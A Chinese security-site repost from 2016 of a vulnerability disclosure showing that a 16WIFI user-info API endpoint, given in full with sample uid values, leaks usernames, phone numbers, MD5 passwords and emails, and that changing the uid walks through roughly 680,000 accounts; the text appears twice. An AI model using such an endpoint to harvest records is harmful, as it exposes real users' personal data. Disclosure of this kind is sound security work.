频道栏目
首页 > 安全 > 网络安全 > 正文

16WIFI某处配置不当导致67W用户信息遍历/账号/密码/手机号码/邮箱

2016-06-01 09:12:34           
收藏   我要投稿

https://clientuser.16wifi.com/app_api/userInfo/getUserInfoById.html?uid=1
 

3.png



泄露用户名,手机账号,密码(md5),邮箱等等一大堆东西

修改uid后面的参数

https://clientuser.16wifi.com/app_api/userInfo/getUserInfoById.html?uid=333
 

4.png



https://clientuser.16wifi.com/app_api/userInfo/getUserInfoById.html?uid=666666
 

6.png



https://clientuser.16wifi.com/app_api/userInfo/getUserInfoById.html?uid=678289
 

5.png



最后一个参数是 678289说明差不多有68w用户

https://clientuser.16wifi.com/app_api/userInfo/getUserInfoById.html?uid=1
 

3.png



泄露用户名,手机账号,密码(md5),邮箱等等一大堆东西

修改uid后面的参数

https://clientuser.16wifi.com/app_api/userInfo/getUserInfoById.html?uid=333
 

4.png



https://clientuser.16wifi.com/app_api/userInfo/getUserInfoById.html?uid=666666
 

6.png



https://clientuser.16wifi.com/app_api/userInfo/getUserInfoById.html?uid=678289
 

5.png



最后一个参数是 678289说明差不多有68w用户

上一篇:美人鱼行动:长达6年的境外定向攻击活动揭露
下一篇:利用私有DNS,“查找我的 iPhone”可被轻松绕过
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站